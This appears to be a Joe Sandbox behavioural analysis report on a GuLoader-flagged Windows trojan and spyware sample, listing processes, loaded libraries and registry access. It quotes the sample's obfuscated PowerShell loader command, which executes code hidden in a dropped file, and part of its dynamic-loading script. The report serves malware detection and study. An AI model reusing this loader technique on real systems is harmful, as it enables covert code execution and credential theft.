Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234BE028 11_2_234BE028
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234B7C28 11_2_234B7C28
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234BAE28 11_2_234BAE28
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234BFC37 11_2_234BFC37
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234BD6C8 11_2_234BD6C8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234B72C8 11_2_234B72C8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234BA4C8 11_2_234BA4C8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234BF2E8 11_2_234BF2E8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234BC0E8 11_2_234BC0E8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234B8EE8 11_2_234B8EE8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234B04F7 11_2_234B04F7
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234BD088 11_2_234BD088
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234B9E88 11_2_234B9E88
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234B8898 11_2_234B8898
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234BEC98 11_2_234BEC98
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234BECA8 11_2_234BECA8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234B88A8 11_2_234B88A8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234BBAA8 11_2_234BBAA8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234E2300 11_2_234E2300
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234E0040 11_2_234E0040
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234E0760 11_2_234E0760
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234EE968 11_2_234EE968
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234E0E48 11_2_234E0E48
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234E1530 11_2_234E1530
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234E1C18 11_2_234E1C18
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234E22F1 11_2_234E22F1
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234E0012 11_2_234E0012
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234E0750 11_2_234E0750
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234E0E38 11_2_234E0E38
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234E1521 11_2_234E1521
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234E1C08 11_2_234E1C08
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_235E2337 11_2_235E2337
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_235E1060 11_2_235E1060
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_235E0448 11_2_235E0448
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\nsv796.tmp\nsExec.dll 1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
Sample file is different than original file name gathered from version info
Source: NDQ211216GM08.exe.bin.exe, 00000000.00000000.998476324.0000000000454000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameisogamies.exeDVarFileInfo$ vs NDQ211216GM08.exe.bin.exe
Source: NDQ211216GM08.exe.bin.exe Binary or memory string: OriginalFilenameisogamies.exeDVarFileInfo$ vs NDQ211216GM08.exe.bin.exe
Uses 32bit PE files
Source: NDQ211216GM08.exe.bin.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/21@5/6
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004034F7
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess, 11_2_004034F7
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_00404AE1 GetDiskFreeSpaceW,MulDiv, 0_2_00404AE1
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_00402210 CoCreateInstance, 0_2_00402210
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe File created: C:\Users\user\AppData\Local\Skakspillene144 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe File created: C:\Users\user\AppData\Local\Temp\nsd2A3.tmp Jump to behavior
Source: NDQ211216GM08.exe.bin.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Nonalined.exe, 0000000B.00000002.2269171713.00000000204F7000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000204A8000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000204B8000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000204C6000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000204EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: NDQ211216GM08.exe.bin.exe Virustotal: Detection: 63%
Source: NDQ211216GM08.exe.bin.exe ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe File read: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe "C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe"
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Heksene=gc -Raw 'C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan';$Bastioned=$Heksene.SubString(52577,3);.$Bastioned($Heksene)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Nonalined.exe "C:\Users\user\AppData\Local\Temp\Nonalined.exe"
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Heksene=gc -Raw 'C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan';$Bastioned=$Heksene.SubString(52577,3);.$Bastioned($Heksene)" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Nonalined.exe "C:\Users\user\AppData\Local\Temp\Nonalined.exe" Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: NDQ211216GM08.exe.bin.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.1434300899.000000000A131000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Temporals $Renovationsvsnet $Juvelbelgningens239), (Coagulable @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Recidivets = [AppDomain]::CurrentDomain.GetA
